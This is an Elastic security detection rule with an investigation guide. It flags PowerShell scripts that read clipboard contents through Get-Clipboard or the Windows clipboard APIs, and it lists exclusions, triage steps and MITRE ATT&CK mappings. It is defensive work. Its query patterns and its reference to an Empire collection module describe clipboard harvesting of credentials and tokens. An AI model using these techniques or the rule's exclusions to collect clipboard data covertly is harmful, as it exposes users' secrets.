PowerShell Suspicious Script with Clipboard Retrieval Capabilities

  1[metadata]
  2creation_date = "2023/01/12"
  3integration = ["windows"]
  4maturity = "production"
  5updated_date = "2026/01/26"
  6
  7[rule]
  8author = ["Elastic"]
  9description = """
 10Detects PowerShell script block content that retrieves clipboard data using Get-Clipboard or Windows clipboard APIs.
 11Adversaries can collect copied credentials, tokens, or other sensitive data from the clipboard.
 12"""
 13from = "now-9m"
 14index = ["winlogbeat-*", "logs-windows.powershell*"]
 15language = "kuery"
 16license = "Elastic License v2"
 17name = "PowerShell Suspicious Script with Clipboard Retrieval Capabilities"
 18note = """## Triage and analysis
 19
 20> **Disclaimer**:
 21> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
 22
 23### Investigating PowerShell Suspicious Script with Clipboard Retrieval Capabilities
 24
 25This alert indicates PowerShell script block content associated with clipboard access. The matched script may use the Get-Clipboard cmdlet or Windows clipboard APIs (for example, Windows.Forms.Clipboard or related UI components) to retrieve user-copied data. Clipboard collection is often opportunistic and may be used to capture credentials, tokens, and other sensitive information copied during normal workflows.
 26
 27#### Key alert fields to review
 28
 29- `user.name`, `user.domain`, `user.id`: Account execution context for correlation, prioritization, and scoping.
 30- `host.name`, `host.id`: Host execution context for correlation, prioritization, and scoping.
 31- `powershell.file.script_block_text`: Script block content that matched the detection logic.
 32- `powershell.file.script_block_id`, `powershell.sequence`, `powershell.total`: Script block metadata to pivot to other fragments or reconstruct full script content when split across multiple events.
 33- `file.path`, `file.directory`, `file.name`: File-origin context when the script block is sourced from an on-disk file.
 34- `powershell.file.script_block_length`: Script block length (size) context.
 35
 36#### Possible investigation steps
 37
 38- Review `powershell.file.script_block_text` to understand the clipboard access technique and usage pattern:
 39  - Get-Clipboard usage versus .NET/UI based access (for example, Windows.Forms.Clipboard, Windows.Clipboard, TextBox.Paste, or methods such as GetText).
 40  - Whether clipboard access appears to be a one-time action or part of repeated/polled collection logic (for example, loops, timers, or repeated calls in the same script).
 41- Reconstruct the complete script when content is split across multiple events:
 42  - Pivot on `powershell.file.script_block_id` and order related events by `powershell.sequence` to rebuild the full script up to `powershell.total`.
 43  - Use `powershell.file.script_block_length` as context for unusually large scripts, which may indicate additional functionality beyond clipboard retrieval.
 44- Evaluate intent by reviewing surrounding logic in `powershell.file.script_block_text`:
 45  - Where clipboard contents are stored (variables, arrays, buffers) and whether the script transforms data after retrieval (for example, encoding, compression, string manipulation, or obfuscation).
 46  - Any indications of staging or transfer behavior following clipboard access (for example, writing data to disk or preparing network requests).
 47- Validate provenance and expected use:
 48  - Use `user.name`, `user.domain`, and `user.id` to determine whether the execution context is expected to run PowerShell that interacts with the clipboard.
 49  - Use `host.name` and `host.id` to determine whether the affected host is a typical endpoint for interactive clipboard use or an unusual target for clipboard collection.
 50  - If `file.path`, `file.directory`, or `file.name` are present, assess whether the script source is expected for the user and host, and whether it is located in a user-writable or temporary location.
 51- Determine execution context and whether the activity is user-driven or automated:
 52  - Correlate activity for the same `host.id` and `user.id` with process execution telemetry (if available) to identify the PowerShell host and its parent process, and whether execution was interactive or automated.
 53  - If authentication telemetry is available, correlate nearby logon activity for the same user and host to identify newly established sessions or unusual remote access preceding the alert.
 54- Scope and prevalence:
 55  - Search for other script block events with similar clipboard-related strings in `powershell.file.script_block_text` for the same `user.id` and `host.id`, and then across other hosts to identify reuse.
 56  - Look for reuse of the same `file.name` or `file.path` across hosts, which can indicate shared tooling or broader distribution.
 57- Assess impact and potential exposure:
 58  - If the script suggests repeated clipboard reads or immediate staging/transfer behavior, treat clipboard contents handled by the affected user on the host during the timeframe as potentially exposed and prioritize investigation accordingly.
 59
 60### False positive analysis
 61
 62- Clipboard retrieval can be legitimate in user productivity scripts, developer/test utilities, and administrative automation that transforms or inserts copied content into other workflows.
 63- Benign activity is more likely when the script source (`file.path`/`file.name`) aligns with known internal tooling, the user context is expected, and the script block text shows clear user-facing intent without follow-on staging or transfer behavior.
 64- False positives are less likely when clipboard access is repeated or automated, appears on atypical hosts for interactive use, or is coupled with suspicious handling of the retrieved data (for example, encoding, buffering, or writing to unexpected locations).
 65
 66### Response and remediation
 67
 68- If the activity is confirmed benign, document the script, expected users/hosts, and the business justification. Ensure the script source is maintained under change control to detect unauthorized modifications.
 69- If suspicious or malicious activity is suspected:
 70  - Contain the affected host to prevent further collection and preserve evidence.
 71  - Preserve relevant artifacts, including all related script block events for the `powershell.file.script_block_id` and any referenced script file from `file.path` (if present).
 72  - Investigate for downstream handling of clipboard data (staging or transfer) using available endpoint, file, network, and authentication telemetry scoped to `host.id` and `user.id`.
 73  - Assess potential credential or token exposure for the affected user and initiate credential hygiene actions appropriate to your environment.
 74  - Remove or remediate the execution source (malicious scripts or unauthorized automation) and investigate for persistence mechanisms that could re-run the clipboard collection.
 75  - Expand scoping by hunting for the same clipboard retrieval patterns in `powershell.file.script_block_text`, and for reuse of the same `file.name`/`file.path` across other hosts.
 76  - Capture lessons learned and update monitoring and access controls to reduce future abuse of PowerShell-based collection techniques while preserving required operational use cases.
 77"""
 78references = [
 79    "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-clipboard",
 80    "https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-ClipboardContents.ps1",
 81]
 82risk_score = 47
 83rule_id = "92984446-aefb-4d5e-ad12-598042ca80ba"
 84setup = """## Setup
 85
 86PowerShell Script Block Logging must be enabled to generate the events used by this rule (e.g., 4104).
 87Setup instructions: https://ela.st/powershell-logging-setup
 88"""
 89severity = "medium"
 90tags = [
 91    "Domain: Endpoint",
 92    "OS: Windows",
 93    "Use Case: Threat Detection",
 94    "Tactic: Collection",
 95    "Data Source: PowerShell Logs",
 96    "Resources: Investigation Guide",
 97]
 98timestamp_override = "event.ingested"
 99type = "query"
100
101query = '''
102event.category:process and host.os.type:windows and
103(
104  (
105    powershell.file.script_block_text : (
106      "Windows.Clipboard" or
107      "Windows.Forms.Clipboard" or
108      "Windows.Forms.TextBox"
109    ) and
110    powershell.file.script_block_text : (
111      "]::GetText" or
112      ".Paste()"
113    )
114  ) or
115  powershell.file.script_block_text : "Get-Clipboard"
116) and
117  not powershell.file.script_block_text : (
118    "sentinelbreakpoints" and "Set-PSBreakpoint" and "PowerSploitIndicators"
119  ) and
120  not user.id : "S-1-5-18" and
121  not (
122    file.path : *WindowsPowerShell\\Modules\\*.ps1 and
123    file.name : ("Convert-ExcelRangeToImage.ps1" or "Read-Clipboard.ps1")
124  ) and
125  not powershell.file.script_block_text : (
126    "Set-Alias -Name \"gcb\" -Value \"Get-Clipboard\"" or
127    "[Windows.Clipboard]::SetText($colorizedText" or
128    "EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"
129  )
130'''
131
132
133[[rule.filters]]
134
135[rule.filters.meta]
136negate = true
137[rule.filters.query.wildcard."file.path"]
138case_insensitive = true
139value = "?:\\\\program?files\\\\powershell\\\\?\\\\Modules\\\\*.psd1"
140[[rule.filters]]
141
142[rule.filters.meta]
143negate = true
144[rule.filters.query.wildcard."file.path"]
145case_insensitive = true
146value = "?:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\*.psd1"
147[[rule.filters]]
148
149[rule.filters.meta]
150negate = true
151[rule.filters.query.wildcard."file.path"]
152case_insensitive = true
153value = "?:\\\\Program?Files\\\\WindowsPowerShell\\\\Modules\\\\*.ps?1"
154[[rule.threat]]
155framework = "MITRE ATT&CK"
156[[rule.threat.technique]]
157id = "T1115"
158name = "Clipboard Data"
159reference = "https://attack.mitre.org/techniques/T1115/"
160
161
162[rule.threat.tactic]
163id = "TA0009"
164name = "Collection"
165reference = "https://attack.mitre.org/tactics/TA0009/"
166[[rule.threat]]
167framework = "MITRE ATT&CK"
168[[rule.threat.technique]]
169id = "T1059"
170name = "Command and Scripting Interpreter"
171reference = "https://attack.mitre.org/techniques/T1059/"
172[[rule.threat.technique.subtechnique]]
173id = "T1059.001"
174name = "PowerShell"
175reference = "https://attack.mitre.org/techniques/T1059/001/"
176
177
178
179[rule.threat.tactic]
180id = "TA0002"
181name = "Execution"
182reference = "https://attack.mitre.org/tactics/TA0002/"
183
184[rule.investigation_fields]
185field_names = [
186    "@timestamp",
187    "user.name",
188    "user.id",
189    "user.domain",
190    "powershell.file.script_block_text",
191    "powershell.file.script_block_id",
192    "powershell.sequence",
193    "powershell.total",
194    "file.path",
195    "file.directory",
196    "file.name",
197    "process.pid",
198    "host.name",
199    "host.id",
200    "powershell.file.script_block_length"
201]